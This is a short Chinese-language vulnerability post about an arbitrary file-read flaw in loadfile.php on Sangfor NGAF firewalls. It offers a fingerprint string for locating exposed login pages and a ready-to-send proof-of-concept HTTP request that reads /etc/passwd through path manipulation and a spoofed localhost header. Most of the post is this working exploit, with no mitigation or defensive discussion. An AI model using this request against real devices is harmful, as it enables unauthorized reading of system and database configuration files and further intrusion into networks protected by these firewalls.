Sangfor下一代防火墙是一款以应用安全需求出发而设计的下一代应用防火墙。Sangfor下一代防火墙在 loadfile.php 处存在文件读取漏洞,攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态
Sangfor NGAF下一代防火墙
"Redirect.php?url=LogInOut.php"
登陆页面
验证POC
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:
User-Agent: Opera/8.90.(Windows NT 6.0; is-IS) Presto/2.9.177 Version/10.00
Accept-Encoding: gzip, deflate
Accept: */*
y-forwarded-for: 127.0.0.1
456 篇文章
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!